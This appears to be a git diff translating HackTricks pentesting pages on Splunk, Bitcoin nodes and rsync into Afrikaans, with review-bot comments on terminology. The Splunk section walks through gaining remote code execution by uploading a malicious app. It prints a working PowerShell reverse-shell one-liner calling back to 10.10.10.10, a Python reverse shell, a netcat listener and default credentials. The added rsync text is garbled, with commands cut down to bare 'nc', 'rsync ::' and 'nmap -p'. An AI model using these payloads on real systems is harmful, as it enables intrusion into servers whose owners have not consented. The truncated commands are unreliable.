-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -Splunk is a **log analytics tool** that plays a crucial role in **gathering, analyzing, and visualizing data**. While its initial purpose was not to serve as a **SIEM (Security Information and Event Management)** tool, it has gained popularity in the realm of **security monitoring** and **business analytics**. - -Splunk deployments are frequently utilized to store **sensitive data** and can serve as a **valuable source of information** for potential attackers if they manage to compromise the system. -**Default port:** 8089 +Splunk is 'n **loganalitiese instrument** wat 'n kritieke rol speel in die **versameling, analise en visualisering van data**. Alhoewel sy oorspronklike doel nie was om as 'n **SIEM (Security Information and Event Management)** instrument te dien nie, het dit gewildheid verwerf in die gebied van **sekuriteitsmonitering** en **sakelike analise**. +Splunk-implementasies word dikwels gebruik om **sensitiewe data** te stoor en kan dien as 'n **waardevolle bron van inligting** vir potensiële aanvallers as hulle die stelsel kan kompromitteer. +**Verstekpoort:** 8089 ``` PORT STATE SERVICE VERSION 8089/tcp open http Splunkd httpd ``` - {% hint style="info" %} -The **Splunk web server runs by default on port 8000**. +Die **Splunk-webbediener loop standaard op poort 8000**. {% endhint %} -## Enumeration +## Opname -### Free Version +### Gratis weergawe -The Splunk Enterprise trial converts to a **free version after 60 days**, which **doesn’t require authentication**. It is not uncommon for system administrators to install a trial of Splunk to test it out, which is **subsequently forgotten about**. This will automatically convert to the free version that does not have any form of authentication, introducing a security hole in the environment. Some organizations may opt for the free version due to budget constraints, not fully understanding the implications of having no user/role management. 
+Die Splunk Enterprise-proef omskep na 'n **gratis weergawe na 60 dae**, wat **geen outentifikasie vereis nie**. Dit is nie ongewoon vir stelseladministrateurs om 'n proefweergawe van Splunk te installeer om dit uit te toets, wat **vervolgens vergeet word**. Dit sal outomaties omskep na die gratis weergawe wat geen vorm van outentifikasie het nie, wat 'n sekuriteitslek in die omgewing inbring. Sommige organisasies mag kies vir die gratis weergawe as gevolg van begrotingsbeperkings, sonder om ten volle te besef wat die implikasies is van geen gebruiker-/rolbestuur nie. -### Default Credentials +### Standaardlegitimasie -On older versions of Splunk, the default credentials are **`admin:changeme`**, which are conveniently displayed on the login page.\ -However, **the latest version of Splunk** sets **credentials** **during the installation process**. If the default credentials do not work, it is worth checking for common weak passwords such as `admin`, `Welcome`, `Welcome1`, `Password123`, etc. +Op ouer weergawes van Splunk is die standaardlegitimasie **`admin:changeme`**, wat gerieflik op die aanmeldingsbladsy vertoon word.\ +Die **nuutste weergawe van Splunk** stel egter **legitimasie in tydens die installasieproses**. As die standaardlegitimasie nie werk nie, is dit die moeite werd om te kyk vir algemene swak wagwoorde soos `admin`, `Welcome`, `Welcome1`, `Password123`, ens. -### Obtain Information +### Verkry inligting -Once logged in to Splunk, we can **browse data,** run **reports**, create **dashboards**, **install applications** from the Splunkbase library, and install custom applications.\ -You can also run code: Splunk has multiple ways of **running code**, such as server-side Django applications, REST endpoints, scripted inputs, and alerting scripts. A common method of gaining remote code execution on a Splunk server is through the use of a scripted input. 
+Sodra jy aangemeld is by Splunk, kan jy **data deursoek**, **verslae uitvoer**, **dashboard skep**, **toepassings installeer** vanaf die Splunkbase-biblioteek, en aangepaste toepassings installeer.\ +Jy kan ook kode uitvoer: Splunk het verskeie maniere om kode uit te voer, soos bedienerkant Django-toepassings, REST-eindpunte, geskrewe insette en waarskuwingsskripte. 'n Algemene metode om afstandsbeheerkode-uitvoering op 'n Splunk-bediener te verkry, is deur die gebruik van 'n geskrewe inset. -Moreover, as Splunk can be installed on Windows or Linux hosts, scripted inputs can be created to run Bash, PowerShell, or Batch scripts. +Verder kan Splunk op Windows- of Linux-gashere geïnstalleer word, en geskrewe insette kan geskep word om Bash-, PowerShell- of Batch-skripte uit te voer. ### Shodan -* `Splunk build` +* `Splunk-bou` ## RCE -### Create Custom Application +### Skep aangepaste toepassing -A custom application can run **Python, Batch, Bash, or PowerShell scripts**.\ -Note that **Splunk comes with Python installed**, so even in **Windows** systems you will be able to run python code. +'n Aangepaste toepassing kan **Python-, Batch-, Bash- of PowerShell-skripte** uitvoer.\ +Let daarop dat **Splunk met Python geïnstalleer kom**, sodat jy selfs op **Windows**-stelsels python-kode kan uitvoer. -You can use [**this**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk package to assist us. The **`bin`** directory in this repo has examples for [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) and [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1). Let's walk through this step-by-step. - -To achieve this, we first need to create a custom Splunk application using the following directory structure: +Jy kan [**hierdie**](https://github.com/0xjpuff/reverse\_shell\_splunk) Splunk-pakket gebruik om ons te help. 
Die **`bin`**-gids in hierdie bewaarplek het voorbeelde vir [Python](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/rev.py) en [PowerShell](https://github.com/0xjpuff/reverse\_shell\_splunk/blob/master/reverse\_shell\_splunk/bin/run.ps1). Kom ons loop hierdie stap-vir-stap deur. +Om dit te bereik, moet ons eers 'n aangepaste Splunk-toepassing skep met die volgende gidsstruktuur: ```shell-session tree splunk_shell/ 
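Review bot: the Shodan query under `### Shodan` was translated from `Splunk build` to `Splunk-bou`; that string is a literal search term typed into Shodan and must stay as `Splunk build`. Related: `geskrewe insette` means "written inputs", but "scripted inputs" is a Splunk feature name, so keep it as `scripted inputs` (or `geskripte insette`) so readers can find it in the Splunk docs and UI, and `## Opname` for "Enumeration" is inconsistent with `## Enumerasie` used in the other files of this PR. Minor: the bold on `**running code**` was dropped in `Splunk het verskeie maniere om kode uit te voer`.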
@@ -70,49 +67,41 @@ splunk_shell/ ├── bin └── default ``` - -The **`bin`** directory will contain any **scripts that we intend to run** (in this case, a **PowerShell** reverse shell), and the default directory will have our `inputs.conf` file. Our reverse shell will be a **PowerShell one-liner:** - +Die **`bin`** gids sal enige **skripte wat ons beoog om uit te voer** (in hierdie geval, 'n **PowerShell** omgekeerde dop) bevat, en die verstek gids sal ons `inputs.conf` lêer hê. Ons omgekeerde dop sal 'n **PowerShell een-liner** wees: ```powershell $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close( ``` - -The [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) file tells Splunk **which script to run** and any other conditions. Here we set the app as enabled and tell Splunk to run the script every 10 seconds. The interval is always in seconds, and the input (script) will only run if this setting is present. - +Die [inputs.conf](https://docs.splunk.com/Documentation/Splunk/latest/Admin/Inputsconf) lêer vertel Splunk **watter skrips om uit te voer** en enige ander voorwaardes. Hier stel ons die app as geaktiveer in en vertel Splunk om die skrips elke 10 sekondes uit te voer. Die interval is altyd in sekondes, en die inset (skrips) sal slegs uitgevoer word as hierdie instelling teenwoordig is. 
```shell-session -cat inputs.conf +cat inputs.conf [script://./bin/rev.py] -disabled = 0 -interval = 10 -sourcetype = shell +disabled = 0 +interval = 10 +sourcetype = shell [script://.\bin\run.bat] disabled = 0 sourcetype = shell interval = 10 ``` +Ons benodig die `.bat` lêer wat uitgevoer sal word wanneer die toepassing geïmplementeer word en die PowerShell een-liner uitvoer. -We need the `.bat` file, which will run when the application is deployed and execute the PowerShell one-liner. - -The next step is to choose `Install app from file` and upload the application. +Die volgende stap is om `Installeer toepassing van lêer` te kies en die toepassing op te laai.
-Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). - +Voordat ons die skadelike aangepaste toepassing oplaai, laat ons 'n luisteraar begin deur gebruik te maak van Netcat of [socat](https://linux.die.net/man/1/socat). ```shell-session sudo nc -lnvp 443 listening on [any] 443 ... ``` - -On the `Upload app` page, click on browse, choose the tarball we created earlier and click `Upload`. As **soon as we upload the application**, a **reverse shell is received** as the status of the application will automatically be switched to `Enabled`. +Op die `Upload app` bladsy, klik op `deursoek`, kies die tarball wat ons vroeër geskep het en klik op `Upload`. Sodra ons die aansoek oplaai, ontvang ons 'n omgekeerde skul as die status van die aansoek outomaties oorgeskakel word na `Enabled`. #### Linux -If we were dealing with a **Linux host**, we would need to **edit the `rev.py` Python script** before creating the tarball and uploading the custom malicious app. The rest of the process would be the same, and we would get a reverse shell connection on our Netcat listener and be off to the races. - +As ons te doen gehad het met 'n Linux-gasheer, sou ons die `rev.py` Python-skripsie moet wysig voordat ons die tarball skep en die aangepaste skadelike aansoek oplaai. Die res van die proses sou dieselfde wees, en ons sou 'n omgekeerde skulverbinding op ons Netcat luisteraar kry en aan die gang wees. ```python import sys,socket,os,pty 
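Review bot: UI labels inside backticks are translated inconsistently: `Install app from file` became `Installeer toepassing van lêer` and `browse` became `deursoek`, while `Upload app`, `Upload` and `Enabled` in the same paragraph stay in English. These are the literal labels shown in the Splunk web UI, which this PR does not localise, so keep all of them in English. Also `omgekeerde skul` / `omgekeerde skulverbinding` is a misspelling and differs from `omgekeerde dop`, used earlier in this hunk for "reverse shell"; settle on one term. The only change to the `cat inputs.conf` block is trailing-whitespace removal on the `-cat inputs.conf ` / `disabled = 0` / `interval = 10` / `sourcetype = shell` lines, which is harmless but adds noise to a translation diff.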
@@ -123,29 +112,28 @@ s.connect((ip,int(port))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn('/bin/bash') ``` - ### RCE & Privilege Escalation -In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence: +In die volgende bladsy kan jy 'n verduideliking vind oor hoe hierdie diens misbruik kan word om voorregte te verhoog en volharding te verkry: {% content-ref url="../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md" %} [splunk-lpe-and-persistence.md](../linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md) {% endcontent-ref %} -## References +## Verwysings * [https://academy.hackthebox.com/module/113/section/1213](https://academy.hackthebox.com/module/113/section/1213)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
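Review bot: In the first hunk of the Splunk page, the paragraph under `Upload app` switches terminology mid-paragraph: `toepassing` (software application) in the first line becomes `aansoek` (a formal request or job application) in the next two sentences, and the UI button label `browse` has been translated to `deursoek` and wrapped in backticks although it was plain text naming an English button; suggest `toepassing` throughout and keeping `browse` as on the original line. `omgekeerde skul` is not an established term for reverse shell and `Python-skripsie` means a Python thesis; `reverse shell` and `Python-skrip` are the usual renderings.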
diff --git a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md index 3f3ab5903..b2e86ac6e 100644 --- a/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md +++ b/network-services-pentesting/8333-18333-38333-18444-pentesting-bitcoin.md @@ -2,44 +2,41 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-## Basic Information +## Basiese Inligting -* The **port 8333** is used by Bitcoin nodes in the **mainnet** to communicate between them. -* The **port 18333** is used Bitcoin nodes in the **testnet** to communicate between them. -* The **port 38333** is used Bitcoin nodes in the **signet** to communicate between them. -* The **port 18444** is used Bitcoin nodes in the **regtest** (local) to communicate between them. - -**Default port:** 8333, 18333, 38333, 18444 +* Die **poort 8333** word deur Bitcoin-nodes in die **mainnet** gebruik om met mekaar te kommunikeer. +* Die **poort 18333** word deur Bitcoin-nodes in die **testnet** gebruik om met mekaar te kommunikeer. +* Die **poort 38333** word deur Bitcoin-nodes in die **signet** gebruik om met mekaar te kommunikeer. +* Die **poort 18444** word deur Bitcoin-nodes in die **regtest** (plaaslike) gebruik om met mekaar te kommunikeer. +**Verstekpoort:** 8333, 18333, 38333, 18444 ``` PORT STATE SERVICE 8333/tcp open bitcoin ``` - ### Shodan * `port:8333 bitcoin` * `User-Agent: /Satoshi` -## Enumeration - -Bitcoin nodes will give you some information if they think that you are another valid bitcoin node. **Nmap** have some script to extract this information: +## Opstel +Bitcoin-nodes sal jou enkele inligting gee as hulle dink jy is 'n geldige bitcoin-node. **Nmap** het 'n paar skripte om hierdie inligting te onttrek: ``` sudo nmap -p 8333 --script bitcoin-info --script bitcoin-getaddr 170.39.103.39 PORT STATE SERVICE 8333/tcp open bitcoin -| bitcoin-info: +| bitcoin-info: | Timestamp: 2022-04-08T22:33:58 | Network: main | Version: 0.7.0 @@ -50,22 +47,21 @@ PORT STATE SERVICE sudo nmap -p 8333 --script bitcoin-getaddr 170.39.103.39 PORT STATE SERVICE 8333/tcp open bitcoin -| bitcoin-getaddr: +| bitcoin-getaddr: | ip timestamp | 2a02:c7e:486a:2b00:3d26:db39:537f:59f2:8333 2022-03-25T07:30:45 | 2600:1f1c:2d3:2403:7b7d:c11c:ca61:f6e2:8333 2022-04-08T07:16:38 | 75.128.4.27:8333 2022-04-02T08:10:45 [...] ``` -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of HackTricks aflaai in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
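Review bot: In the `@@ -2,44 +2,41 @@` hunk of the Bitcoin page, dropping the blank line between the last `* Die **poort 18444** ...` bullet and `**Verstekpoort:** 8333, 18333, 38333, 18444` makes Markdown treat the port line as a lazy continuation of that bullet, so the default-port line renders indented inside the list; restore the blank line. `## Opstel` (compose / set up) is not a translation of `## Enumeration`; the rsync page in this same commit uses `## Opname`, so use that here for consistency. The sentence `Bitcoin-nodes sal jou enkele inligting gee as hulle dink jy is 'n geldige bitcoin-node` also loses `another` from the original; `'n ander geldige bitcoin-node` keeps the meaning.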
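Review bot: The `@@ -50,22 +47,21 @@` hunk of the Bitcoin page only strips trailing whitespace from `| bitcoin-getaddr:` inside the quoted nmap output (the previous hunk does the same to `| bitcoin-info:`); those are captured tool-output lines, not prose, and the change is unrelated to the translation, so either drop it or leave the captured lines exactly as recorded.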
diff --git a/network-services-pentesting/873-pentesting-rsync.md b/network-services-pentesting/873-pentesting-rsync.md index 3c995ada2..cb95e193c 100644 --- a/network-services-pentesting/873-pentesting-rsync.md +++ b/network-services-pentesting/873-pentesting-rsync.md @@ -2,35 +2,94 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -From [wikipedia](https://en.wikipedia.org/wiki/Rsync): +Vanaf [wikipedia](https://en.wikipedia.org/wiki/Rsync): -> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File\_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File\_synchronization) [files](https://en.wikipedia.org/wiki/Computer\_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer\_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating\_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta\_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security. 
- -**Default port:** 873 +> **rsync** is 'n hulpmiddel vir doeltreffende [oorplasing](https://en.wikipedia.org/wiki/File\_transfer) en [sinsronisering](https://en.wikipedia.org/wiki/File\_synchronization) van [lêers](https://en.wikipedia.org/wiki/Computer\_file) tussen 'n rekenaar en 'n eksterne harde skyf en oor [netwerkgekoppelde](https://en.wikipedia.org/wiki/Computer\_network) [rekenaars](https://en.wikipedia.org/wiki/Computer) deur die [wyzigingstye](https://en.wikipedia.org/wiki/Timestamping\_\(computing\)) en groottes van lêers te vergelyk.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) Dit word algemeen gevind op [Unix-soortgelyke](https://en.wikipedia.org/wiki/Unix-like) [bedryfstelsels](https://en.wikipedia.org/wiki/Operating\_system). Die rsync-algoritme is 'n tipe [delta-kodering](https://en.wikipedia.org/wiki/Delta\_encoding) en word gebruik om netwerkgebruik te verminder. [Zlib](https://en.wikipedia.org/wiki/Zlib) kan gebruik word vir addisionele [datakompressie](https://en.wikipedia.org/wiki/Data\_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) en [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) of [stunnel](https://en.wikipedia.org/wiki/Stunnel) kan gebruik word vir sekuriteit. +**Verstekpoort:** 873 ``` PORT STATE SERVICE REASON 873/tcp open rsync syn-ack ``` +## Opname -## Enumeration +### Baniere & Handleiding kommunikasie -### Banner & Manual communication +Die eerste stap in die opname van 'n rsync-diens is om die baniere en handleiding kommunikasie te ondersoek. Hierdie inligting kan waardevolle inligting verskaf oor die diens en moontlike kwesbaarhede. +#### Baniere + +Om die baniere van 'n rsync-diens te ondersoek, kan jy die volgende opdrag gebruik: + +```bash +nc +``` + +As jy 'n suksesvolle verbinding maak, sal jy die baniere van die rsync-diens sien. Hierdie inligting kan nuttig wees om die spesifieke weergawe van die rsync-diens te identifiseer en moontlike kwesbaarhede te vind. 
+ +#### Handleiding kommunikasie + +Om die handleiding kommunikasie van 'n rsync-diens te ondersoek, kan jy die volgende opdrag gebruik: + +```bash +rsync :: +``` + +Hierdie opdrag sal 'n lys van beskikbare modules vir die rsync-diens gee. Dit kan nuttige inligting verskaf oor die struktuur en inhoud van die diens. + +### Portskandering + +Die volgende stap in die opnameproses is om die poorte van die rsync-diens te skandeer om te bepaal watter poorte oop is en beskikbaar is vir kommunikasie. + +Jy kan 'n skandering van die poorte uitvoer deur die volgende opdrag te gebruik: + +```bash +nmap -p +``` + +Vervang `` met die spesifieke poortreeks wat jy wil skandeer, en `` met die IP-adres van die teikenstelsel. + +Die resultate van die poortskandering kan aandui watter poorte oop is en moontlik toegang tot die rsync-diens bied. + +### Module-analise + +Nadat jy 'n lys van beskikbare modules vir die rsync-diens verkry het, kan jy elke module ondersoek om te bepaal watter aksies en funksies beskikbaar is. + +Om 'n spesifieke module te ondersoek, kan jy die volgende opdrag gebruik: + +```bash +rsync :: +``` + +Vervang `` met die IP-adres van die teikenstelsel en `` met die naam van die spesifieke module wat jy wil ondersoek. + +Hierdie analise kan jou help om die funksionaliteit en moontlike kwesbaarhede van elke module te verstaan. + +### Verkenning van kwesbaarhede + +Nadat jy die rsync-diens ondersoek het, kan jy spesifieke kwesbaarhede verken om toegang tot die stelsel te verkry. + +Hier is 'n paar algemene kwesbaarhede wat jy kan ondersoek: + +- **Geen wagwoord vereis**: Sommige rsync-dienskonfigurasies mag nie 'n wagwoord vereis nie, wat beteken dat jy sonder verifikasie toegang kan verkry. +- **Onveilige oorskrywing**: As die rsync-diens oorskrywing toelaat, kan jy moontlik skadelike lêers oorskryf en uitvoerbaar maak. 
+- **Onveilige lêerhantering**: As die rsync-diens nie behoorlike lêerhantering toepas nie, kan jy moontlik toegang verkry tot gevoelige lêers of lêers wat nie bedoel is om gedeel te word nie. + +Deur hierdie kwesbaarhede te ondersoek, kan jy moontlik toegang tot die stelsel verkry en verdere aanvalle uitvoer. ```bash nc -vn 127.0.0.1 873 (UNKNOWN) [127.0.0.1] 873 (rsync) open @@ -38,8 +97,8 @@ nc -vn 127.0.0.1 873 @RSYNCD: 31.0 <--- Then you send the same info #list <--- Then you ask the sever to list raidroot <--- The server starts enumerating -USBCopy -NAS_Public +USBCopy +NAS_Public _NAS_Recycle_TOSRAID <--- Enumeration finished @RSYNCD: EXIT <--- Sever closes the connection @@ -52,11 +111,9 @@ nc -vn 127.0.0.1 873 raidroot @RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password ``` +### **Opsomming van Gedeelde Lêers** -### **Enumerating Shared Folders** - -**Rsync modules** are recognized as **directory shares** that might be **protected with passwords**. To identify available modules and check if they require passwords, the following commands are used: - +**Rsync-modules** word erken as **gidsaandele** wat moontlik **met wagwoorde beskerm** kan word. Om beskikbare modules te identifiseer en te kontroleer of hulle wagwoorde vereis, word die volgende opdragte gebruik: ```bash nmap -sV --script "rsync-list-modules" -p msf> use auxiliary/scanner/rsync/modules_list 
